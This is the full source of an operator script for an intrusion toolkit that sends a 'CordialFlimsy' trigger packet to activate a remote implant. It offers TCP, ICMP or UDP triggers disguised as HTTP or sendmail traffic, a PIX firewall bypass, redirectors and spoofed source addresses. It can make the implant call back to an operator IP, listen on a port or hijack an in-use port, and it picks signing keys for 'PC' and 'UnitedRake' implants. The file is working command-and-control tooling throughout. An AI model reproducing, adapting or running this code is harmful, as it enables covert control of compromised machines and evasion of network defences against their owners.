@include "_Arrays.dsi"; @include "_LpHelperFunctions.dsi"; @include "_Paths.dsi"; @include "_Versions.dsi"; @include "_SendCFTrigger.dsi"; if ($argc != 1) { echo "Usage: $argv[0]"; echo " Sends a CordialFlimsy trigger"; return false; } string %params; while (true) { # get the target address GetUserValue("Enter the TARGET ip address", %params, "dstAddr", "IP"); # get the final destination address # (default to dstAddr) if (!defined(%params{'finalDstAddr'})) { %params{'finalDstAddr'} = %params{'dstAddr'}; } GetUserValue("Enter the FINAL DESTINATION ip address", %params, "finalDstAddr", "IP"); # get the local IP GetUserValue("Enter the LOCAL ip address", %params, "localAddr", "LOCALIP"); # get the source IP # (default to the chosen local IP) if (!defined(%params{'srcAddr'})) { %params{'srcAddr'} = %params{'localAddr'}; } GetUserValue("Enter the SOURCE ip address", %params, "srcAddr", "IP"); if (prompt("Will this operation be REDIRECTED?", defined(%params{'redirectAddr'}))) { # get the redirect address # (default to loopback) if (!defined(%params{'redirectAddr'})) { %params{'redirectAddr'} = ""; } GetUserValue("Enter the REDIRECT ip address", %params, "redirectAddr", "IP"); GetUserValue("Enter the REDIRECT PORT", %params, "redirectPort", "PORT"); } else { UndefKey(%params, "redirectAddr"); UndefKey(%params, "redirectPort"); } # ur compatible trigger if (prompt("Will this be a UnitedRake Trigger?", defined(%params{'urCompatible'}))) { %params{'urCompatible'} = "true"; } else { UndefKey(%params, "urCompatible"); } # determine the trigger action type ChooseAction(%params); # determine the trigger protocol ChooseProtocol(%params); ChooseFirewall(%params); if (defined(%params{'urCompatible'})) { %params{'id'} = "0"; # get the public key GetUserValue("Enter the PUBLIC KEY location", %params, "key", "KEY"); } else { # get the target id GetUserValue("Enter the target's PC ID", %params, "id", "INT"); # get timestamp if ((%params{'id'} == 0) || prompt("TIMESTAMP the trigger packet?")) { GetUserValue("Enter the trigger TIMESTAMP", %params, "timestamp", "TIMESTAMP"); } # get the private key GetUserValue("Enter the PRIVATE KEY location", %params, "key", "KEY"); } # print the information echo "--------------------------------------------------------------------"; echo "Network Parameters:"; echo " Target IP : %params{'dstAddr'}"; echo " Final Dest IP : %params{'finalDstAddr'}"; echo " Source IP : %params{'srcAddr'}"; if (defined(%params{'redirectAddr'})) { echo " Using Redirection : YES"; echo " Redirector IP : %params{'redirectAddr'}"; echo " Redirector Port : %params{'redirectPort'}"; } else { echo " Using Redirection : NO"; echo " Redirector IP : "; echo " Redirector Port : "; } echo ""; echo "Trigger Parameters:"; echo " Protocol : %params{'protocol'}"; if (%params{'protocol'} == "ICMP") { echo " ICMP type : %params{'icmpType'}"; echo " ICMP code : %params{'icmpCode'}"; } else { echo " Source port : %params{'protoSrcPort'}"; echo " Destination port : %params{'protoDstPort'}"; if (%params{'protocol'} == "TCP") { if (defined(%params{'fullConnect'})) { echo " Full TCP Connection : YES"; echo " TCP flags : "; } else { echo " Full TCP connection : NO"; echo " TCP flags : %params{'tcpFlags'}"; } } } if (defined(%params{'format'}) && %params{'format'} != "NONE") { echo " Format : %params{'format'}"; if (%params{'format'} == "HTTP") { echo " HTTP Action : %params{'httpType'}"; echo " User-Agent : %params{'httpAgent'}"; echo " Domain : %params{'httpDomain'}"; echo " Webpage : %params{'httpPage'}"; } else { if (defined(%params{'sendTo'})) { echo " Send-To Address : %params{'sendTo'}"; echo " Send-From Address : %params{'sendFrom'}"; } } } if (defined(%params{'firewall'}) && (%params{'firewall'} != "NONE")) { echo " Firewall Bypass : %params{'firewall'}"; } else { echo " Firewall Bypass : "; } echo ""; echo "Implant Parameters:"; echo " Action : %params{'action'}"; if (%params{'action'} == "CALLBACK") { echo " Callback IP : %params{'actionAddr'}"; echo " Callback Src Port : %params{'actionSrcPort'}"; echo " Callback Dst Port : %params{'actionDstPort'}"; } else { echo " Listen bind IP : %params{'actionAddr'}"; echo " Listen Port : %params{'actionSrcPort'}"; echo " Listen Time : %params{'actionTime'}"; } echo " Target ID : %params{'id'}"; if (defined(%params{'timestamp'})) { echo " Timestamp : %params{'timestamp'}"; } echo " Key : %params{'key'}"; if (defined(%params{'urCompatible'})) { echo " UR Compatible : %params{'urCompatible'}"; } if (!prompt("Continue with the current values?")) { # go back to start continue; } # send the trigger SendTrigger(%params); if (!prompt("Send another trigger?")) { break; } } return true; #------------------------------------------------------------------------------- sub ChooseAction(REF string %params) { if (defined(%params{'urCompatible'})) { %params{'action'} = "CALLBACK"; } else { # determine the trigger action type string $choices; _AppendString($choices, "CALLBACK"); _AppendString($choices, "LISTEN"); GetUserChoice("Choose the callback ACTION", $choices, %params, "action"); } if (%params{'action'} == "CALLBACK") { # callback # get the callback IP # (default to local IP) if (!defined(%params{'actionAddr'})) { %params{'actionAddr'} = %params{'localAddr'}; } GetUserValue("Enter the CALLBACK IP address", %params, "actionAddr", "IP"); # get the callback src port # (default to 0) if (!defined(%params{'actionSrcPort'})) { %params{'actionSrcPort'} = "0"; } if (!defined(%params{'urCompatible'})) { GetUserValue("Enter the CALLBACK SOURCE PORT", %params, "actionSrcPort", "PORT"); } # get the callback dst port # (default to 0) if (!defined(%params{'actionDstPort'})) { %params{'actionDstPort'} = "0"; } GetUserValue("Enter the CALLBACK DESTINATION PORT", %params, "actionDstPort", "PORT"); if (!defined(%params{'urCompatible'})) { if (prompt("Set proxy information?", defined(%params{'proxyAddr'}))) { GetUserValue("Enter the proxy address", %params, "proxyAddr", "IP"); GetUserValue("Enter the proxy port", %params, "proxyPort", "PORT"); if (prompt("Set proxy user/pass?", defined(%params{'proxyUser'}))) { GetUserValue("Enter the proxy username", %params, "proxyUser", "STRING"); GetUserValue("Enter the proxy password", %params, "proxyPass", "STRING"); } else { if (defined(%params{'proxyUser'})) { undef(%params{'proxyUser'}); } if (defined(%params{'proxyPass'})) { undef(%params{'proxyPass'}); } } } else { if (defined(%params{'proxyAddr'})) { undef(%params{'proxyAddr'}); } if (defined(%params{'proxyPort'})) { undef(%params{'proxyPort'}); } if (defined(%params{'proxyUser'})) { undef(%params{'proxyUser'}); } if (defined(%params{'proxyPass'})) { undef(%params{'proxyPass'}); } } } } else { # listen # get the listen bind IP # (default to if (!defined(%params{'actionAddr'})) { %params{'actionAddr'} = ""; } GetUserValue("Enter the LISTEN BIND address", %params, "actionAddr", "IP"); # get the listen port # (default to 0) if (!defined(%params{'actionSrcPort'})) { %params{'actionSrcPort'} = "1934"; } GetUserValue("Enter the LISTEN PORT", %params, "actionSrcPort", "PORT"); # get the listen time # (default to 300) if (!defined(%params{'actionTime'})) { %params{'actionTime'} = "300"; } GetUserValue("Enter the LISTEN TIME (in seconds)", %params, "actionTime", "INT"); if (prompt("Are you stealing an in-use port?", defined(%params{'reuseAddr'}))) { GetUserValue("Enter the traffic source address", %params, "reuseAddr", "IP"); GetUserValue("Enter the traffic source port", %params, "reusePort", "PORT"); } else { if (defined(%params{'reuseAddr'})) { undef(%params{'reuseAddr'}); } if (defined(%params{'reusePort'})) { undef(%params{'reusePort'}); } } } return true; } /* END ChooseAction */ #------------------------------------------------------------------------------- sub ChooseFirewall(REF string %params) { string $choices; _AppendString($choices, "NONE"); _AppendString($choices, "PIX"); GetUserChoice("Choose the trigger FORMAT", $choices, %params, "firewall"); return true; } /* END ChooseFirewall */ #------------------------------------------------------------------------------- sub ChooseFormat(REF string %params, IN string $choices) { GetUserChoice("Choose the trigger FORMAT", $choices, %params, "format"); if (%params{'format'} == "HTTP") { # HTTP # Get the request type string $type; _AppendString($type, "POST"); _AppendString($type, "GET"); GetUserChoice("Choose the HTTP TYPE", $type, %params, "httpType"); # get the user-agent if (!defined(%params{'httpAgent'})) { %params{'httpAgent'} = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"; } GetUserValue("Enter the HTTP USER-AGENT", %params, "httpAgent", "STRING"); # get the domain string $domain; GetUserString("Enter the HTTP DOMAIN", %params, "httpDomain", $domain); %params{'httpDomain'} = $domain; # get the webpage # (default to "/") if (!defined(%params{'httpPage'})) { %params{'httpPage'} = "/"; } string $page; GetUserString("Enter the HTTP WEBPAGE PATH", %params, "httpPage", $page); # see if we need to fix up the page if (RegExMatch("^[^/].*\$", $page) && RegExMatch("^.*[^/]\$", $domain)) { $page = "/$page"; } %params{'httpPage'} = $page; } else { # something other than HTTP # send-addresses if (prompt("Set SEND-TO and SEND-FROM addresses?", defined(%params{'sendTo'}))) { GetUserValue("Enter the SEND-TO ADDRESS", %params, "sendTo", "STRING"); GetUserValue("Enter the SEND-FROM ADDRESS", %params, "sendFrom", "STRING"); } } return true; } /* END ChooseFormat */ #------------------------------------------------------------------------------- sub ChooseProtocol(REF string %params) { # determine the trigger action type string $choices; _AppendString($choices, "TCP"); _AppendString($choices, "ICMP"); _AppendString($choices, "UDP"); GetUserChoice("Choose the trigger PROTOCOL type", $choices, %params, "protocol"); if (%params{'protocol'} == "TCP") { # TCP string $formatChoices; _AppendString($formatChoices, "NONE"); _AppendString($formatChoices, "HTTP"); # get the source port # (default to 0) if (!defined(%params{'protoSrcPort'})) { %params{'protoSrcPort'} = "0"; } GetUserValue("Enter the TCP SOURCE PORT", %params, "protoSrcPort", "PORT"); # get the destination port # (default to 0) if (!defined(%params{'protoDstPort'})) { %params{'protoDstPort'} = "80"; } GetUserValue("Enter the TCP DESTINATION PORT", %params, "protoDstPort", "PORT"); # tcp connect if (prompt("Perform a full TCP connection?", defined(%params{'fullConnect'}))) { # doing a full connection %params{'fullConnect'} = "true"; _AppendString($formatChoices, "SENDMAIL"); } else { # not doing a full connection UndefKey(%params, "fullConnect"); # set tcp flags # (default to ack) if (!defined(%params{'tcpFlags'})) { %params{'tcpFlags'} = "ack"; } while (true) { echo "Valid Flags:"; echo " syn fin rst push ack urg"; string $flags; if (!GetUserString("Enter comma seperated TCP FLAGS", %params, "tcpFlags", $flags)) { return false; } if (RegExMatch("^((syn|fin|rst|push|ack|urg),)*(syn|fin|rst|push|ack|urg){1}\$", $flags)) { %params{'tcpFlags'} = $flags; break; } else { echo("Invalid tcp flags", ERROR); } } } # choose a format ChooseFormat(%params, $formatChoices); } else if (%params{'protocol'} == "ICMP") { # ICMP # get the ICMP type # (default to 8) if (!defined(%params{'icmpType'})) { %params{'icmpType'} = "8"; } GetUserValue("Enter the ICMP TYPE", %params, "icmpType", "INT"); # get the ICMP code # (default to 0) if (!defined(%params{'icmpCode'})) { %params{'icmpCode'} = "0"; } GetUserValue("Enter the ICMP CODE", %params, "icmpCode", "INT"); } else { # UDP # get the source port # (default to 0) if (!defined(%params{'protoSrcPort'})) { %params{'protoSrcPort'} = "0"; } GetUserValue("Enter the UDP SOURCE PORT", %params, "protoSrcPort", "PORT"); # get the destination port # (default to 0) if (!defined(%params{'protoDstPort'})) { %params{'protoDstPort'} = "53"; } GetUserValue("Enter the UDP DESTINATION PORT", %params, "protoDstPort", "PORT"); } return true; } /* END ChooseProtocol */ #------------------------------------------------------------------------------- sub GetCurrentTimestamp(OUT string $timestamp) { string $temp; if (GetTimestamp($temp)) { string $values; if (RegExMatch("^([0-9]{4})_([0-9]{2})_([0-9]{2})_([0-9]{2})h([0-9]{2})m([0-9]{2})s\$", $temp, $values)) { if (sizeof($values) == 6) { $timestamp = "$values[0]-$values[1]-$values[2] $values[3]:$values[4]:$values[5]"; return true; } } } return false; } /* END GetCurrentTimestamp */ #------------------------------------------------------------------------------- sub GetUserChoice(IN string $comment, IN string $choices, REF string %params, IN string $key) { int $numChoices = sizeof($choices); string $defaultValue="0"; if (defined(%params{$key})) { # user has made a choice -- look for it for (int $i=0; $i < $numChoices; $i++) { if ($choices[$i] == %params{$key}) { $defaultValue = "$i"; break; } } } echo "Choices :"; for (int $i=0; $i < $numChoices; $i++) { echo " $i - $choices[$i]"; } while (true) { int $value; if (!GetUserInt($comment, $defaultValue, $value)) { return false; } if (($value >= 0) && ($value < $numChoices)) { %params{$key} = $choices[$value]; return true; } else { int $maxIndex = $numChoices; $maxIndex--; echo "Value must be between 0 and $maxIndex"; } } # shouldn't get here return false; } /* END GetUserChoice */ #------------------------------------------------------------------------------- sub GetUserInt(IN string $comment, IN string $defaultValue, OUT int $value) { if (defined($defaultValue)) { while (!GetInput($comment, $value, $defaultValue)) { # just loop } } else { while (!GetInput($comment, $value)) { # just loop } } return true; } /* END GetUserInt */ #------------------------------------------------------------------------------- sub GetUserString(IN string $comment, IN string %params, IN string $key, OUT string $value) { if (defined(%params{'$key'})) { while (!GetInput($comment, $value, %params{'$key'})) { # just loop } } else { while (!GetInput($comment, $value)) { # just loop } } return true; } /* END GetUserString */ #------------------------------------------------------------------------------- sub GetUserValue(IN string $comment, REF string %params, IN string $key, IN string $type) { bool $gotValue=false; while (!$gotValue) { if ($type == "LOCALIP") { PrintLocalAddrs(%params, $key); } else if ($type == "TIMESTAMP") { if (!defined(%params{$key})) { GetCurrentTimestamp(%params{$key}); } } else if ($type == "KEY") { PrintKeys(%params, $key); } # get the value string $value; if (!GetUserString($comment, %params, $key, $value)) { return false; } # check the value against the type if ($type == "IP" || $type == "LOCALIP") { if (RegExMatch("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\$", $value)) { # good ip $gotValue = true; %params{$key} = $value; } else { echo("The value must be of the form ###.###.###.###", ERROR); } } else if ($type == "PORT") { if (RegExmatch("^[0-9]+\$", $value) && ($value >= 0) && ($value <= 65535)) { # good port $gotValue = true; %params{$key} = $value; } else { echo("The value must be a value port value (0 - 65535)", ERROR); } } else if ($type == "INT") { if (RegExmatch("^(0x){0,1}[0-9]+\$", $value)) { # good value $gotValue = true; %params{$key} = $value; } else { echo("The value must be a number", ERROR); } } else if ($type == "TIMESTAMP") { if (RegExmatch("^[0-9]{4}-[0-9]{1,2}-[0-9]{1,2} [0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}\$", $value)) { # good value $gotValue = true; %params{$key} = $value; } else { echo("The value must be a timestamp (YYYY-MM-DD hh:mm:ss)", ERROR); } } else if ($type == "KEY") { string $lines; if (ReadFile($value, $lines)) { # good value $gotValue = true; %params{$key} = $value; } else { echo("Unable to open keyfile", ERROR); } } else if ($type == "STRING") { # no error checking $gotValue = true; %params{$key} = $value; } else { echo("Unknown type ($type) -- no error checking", ERROR); $gotValue = true; %params{$key} = $value; } } return true; } /* END GetUserValue */ #------------------------------------------------------------------------------- sub PrintKeys(REF string %params, IN string $key) { string $resDir; if (!_GetLpResourcesDirectory($resDir)) { return false; } string $files; string $pc16Files; if (!defined(%params{'urCompatible'}) && FileGetFiles("$resDir/Pc/Keys/", "private_key.bin", $files, true)) { echo "Possible PC 2.x keys:"; for (int $i=0; $i < sizeof($files); $i++) { string $fullDir = $files[$i]; _NormalizePath($fullDir); echo " $fullDir"; if (!defined(%params{$key}) && RegExMatch("Default", $fullDir)) { %params{$key} = $fullDir; } } } if (defined(%params{'urCompatible'}) && FileGetFiles("$resDir/Ur/Keys/", "*URPublicKey.bin", $files, true)) { echo "Possible UR 4.x keys:"; for (int $i=0; $i < sizeof($files); $i++) { string $fullDir = $files[$i]; _NormalizePath($fullDir); echo " $fullDir"; if (!defined(%params{$key})) { %params{$key} = $fullDir; } } } return true; } /* END PrintKeys */ #------------------------------------------------------------------------------- sub PrintLocalAddrs(REF string %params, IN string $key) { string $envValue, $localAddrs; if (GetEnv("_LOCAL_ADDRESSES", $envValue)) { RegExSplit(";", $envValue, 0, $localAddrs); } else { # local addrs not found -- use ifconfig to get them @record on; @echo off; if (`local ifconfig`) { GetCmdData("InterfaceItem::ipaddress::ip", $localAddrs); } @echo on; @record off; # store the IPs for later user $envValue = ""; for (int $i=0; $i < sizeof($localAddrs); $i++) { if (StrLen($envValue) > 0) { StrCat($envValue, ";"); } StrCat($envValue, $localAddrs[$i]); } if (StrLen($envValue) > 0) { SetEnv("_LOCAL_ADDRESSES", $envValue); } } echo "LOCAL IP ADDRESSES:"; for (int $i=0; $i < sizeof($localAddrs); $i++) { # if no local ip has been set yet, default to the first one found if (($i == 0) && !defined(%params{$key})) { %params{$key} = $localAddrs[$i]; } if ($localAddrs[$i] != "" && $localAddrs[$i] != "::1") { echo " $localAddrs[$i]"; } } return true; } /* END PrintLocalAddrs */